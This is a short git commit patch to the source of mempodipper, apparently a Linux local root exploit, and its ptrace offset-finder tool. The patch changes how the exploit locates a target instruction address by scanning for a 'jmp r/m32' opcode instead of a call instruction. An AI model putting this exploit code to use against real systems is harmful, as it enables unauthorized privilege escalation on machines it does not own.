From 513018e62ef0ef9a309299e1a7dcc0c0c3eb1b7d Mon Sep 17 00:00:00 2001 From: "Jason A. Donenfeld" Date: Tue, 24 Jan 2012 17:38:32 +0100 Subject: Search for IP of next jmp instead. --- mempodipper.c | 10 +++------- ptrace-offset-finder.c | 9 +++------ 2 files changed, 6 insertions(+), 13 deletions(-) diff --git a/mempodipper.c b/mempodipper.c index dcc037c..e35d62a 100644 --- a/mempodipper.c +++ b/mempodipper.c @@ -17,7 +17,6 @@ #define _LARGEFILE64_SOURCE #include -#include #include #include #include @@ -126,12 +125,9 @@ unsigned long ptrace_address() #error "That platform is not supported." #endif if (instruction_pointer < upper_bound) { - uint32_t instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL); - int operator = instruction & 0xFF; - if (operator == 0xe8 /* call */) { - int32_t offset = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer + 1, NULL) + 5; - return instruction_pointer + offset; - } + unsigned long instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL); + if ((instruction & 0xffff) == 0x25ff /* jmp r/m32 */) + return instruction_pointer; } } } else { diff --git a/ptrace-offset-finder.c b/ptrace-offset-finder.c index d339c18..5a5daab 100644 --- a/ptrace-offset-finder.c +++ b/ptrace-offset-finder.c @@ -1,6 +1,5 @@ #include #include -#include #include #include #include @@ -41,11 +40,9 @@ int main(int argc, char *argv[]) #error "That platform is not supported." #endif if (instruction_pointer < upper_bound) { - uint32_t instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL); - int operator = instruction & 0xFF; - if (operator == 0xe8 /* call */) { - int32_t offset = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer + 1, NULL) + 5; - printf("0x%lx\n", instruction_pointer + offset); + unsigned long instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL); + if ((instruction & 0xffff) == 0x25ff /* jmp r/m32 */) { + printf("0x%lx\n", instruction_pointer); break; } } -- cgit v1.2.3-59-g8ed1b